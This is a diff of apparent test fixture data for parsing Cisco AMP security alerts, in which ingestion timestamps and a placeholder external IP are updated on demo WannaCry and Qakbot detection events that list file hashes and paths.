}, 
@@ -3205,8 +3205,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798739078Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":732000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010828300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":732000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -3228,7 +3228,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3271,7 +3271,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3285,8 +3285,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798741293Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010833700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -3308,7 +3308,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3351,7 +3351,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3365,8 +3365,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798743492Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010839Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -3388,7 +3388,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3431,7 +3431,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3445,8 +3445,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798745729Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010844300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -3468,7 +3468,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3509,7 +3509,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3519,8 +3519,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798747986Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:47.010849600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3540,7 +3540,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3594,7 +3594,7 @@ "f5a171c879b90e77861daf19741b373646d791ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3611,8 +3611,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798750224Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", + "ingested": "2021-12-09T13:35:47.010854800Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3634,7 +3634,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3680,7 +3680,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3693,8 +3693,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798752439Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870786\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"\",\"file_path\":\"\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:47.010860100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870786\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"\",\"file_path\":\"\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3716,7 +3716,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3766,7 +3766,7 @@ "f5a171c879b90e77861daf19741b373646d791ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3783,8 +3783,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798754652Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", + "ingested": "2021-12-09T13:35:47.010865400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3806,7 +3806,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3847,7 +3847,7 @@ 